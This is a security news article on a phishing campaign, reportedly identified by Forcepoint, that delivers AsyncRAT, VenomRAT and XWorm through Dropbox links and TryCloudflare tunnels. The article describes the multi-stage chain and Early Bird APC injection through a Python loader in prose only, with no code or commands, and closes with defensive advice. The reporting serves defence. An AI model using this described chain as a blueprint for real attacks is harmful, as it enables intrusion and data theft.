AsyncRAT Campaign Leverages Cloud Services and Python for Stealthy Malware Delivery
A sophisticated phishing campaign is distributing the AsyncRAT malware by abusing trusted cloud services like Dropbox and TryCloudflare tunnels, employing a multi-stage process involving obfuscated scripts and Python for stealthy payload deployment.

A new wave of attacks is leveraging the AsyncRAT remote access trojan, employing a sophisticated delivery chain that abuses legitimate cloud infrastructure to evade security defenses. Threat actors are utilizing Dropbox links and TryCloudflare tunnels, services typically whitelisted by security solutions, to distribute malware that can spy on victims, steal data, and grant attackers remote control over infected systems.
Researchers from Forcepoint have identified this campaign, noting its similarity to previous attacks and its alignment with predictions about the increasing abuse of legitimate infrastructure by adversaries. The infection process begins with a phishing email containing a deceptive invoice theme and a Dropbox link. Upon clicking the link, victims download a ZIP file containing an internet shortcut (.LNK) file. This shortcut initiates a chain reaction, connecting to a TryCloudflare subdomain that hosts further malicious components.
The .LNK file, when executed, uses PowerShell to download a JavaScript file from the same tunnel. This JavaScript, after being deobfuscated, fetches a heavily obfuscated batch file. This batch file is the core of the initial infection stage; it simultaneously displays a fake PDF invoice to the victim as a decoy while downloading a second ZIP file. This second ZIP archive contains a Python package, which is crucial for deploying the final payload.
The Python package is designed to appear harmless, with most files serving as standard setup components. However, a single script named load.py, along with five accompanying binary files, executes the malicious actions. The load.py script leverages Python's ctypes library to interact directly with Windows system functions. This allows it to allocate memory, create threads, and inject shellcode into legitimate processes, a technique known as Early Bird APC queue injection.
This injection method plants malicious code into a newly created process before its main thread begins execution, significantly increasing the difficulty for antivirus and endpoint detection solutions to identify and block the threat. The specific payload deployed depends on which binary file is processed by load.py. Variants have been observed injecting VenomRAT into notepad.exe, XWorm into other processes, and AsyncRAT shellcode into legitimate system processes like explorer.exe.
All identified variants of the campaign communicate with command-and-control (C2) servers over various ports, indicating a coordinated effort to maintain access and control over compromised systems. Forcepoint notes that its customers have existing protections against several stages of this attack chain, including blocking malicious attachments, URLs, and C2 traffic.
For organizations and individuals not protected by such advanced security measures, vigilance against unexpected invoice emails and unsolicited ZIP or shortcut files remains paramount. Enabling PowerShell logging can also provide an early warning system for such infections. The continued reliance on legitimate cloud services and obfuscation techniques highlights a growing trend where attackers aim to blend in with normal network traffic, making detection increasingly challenging.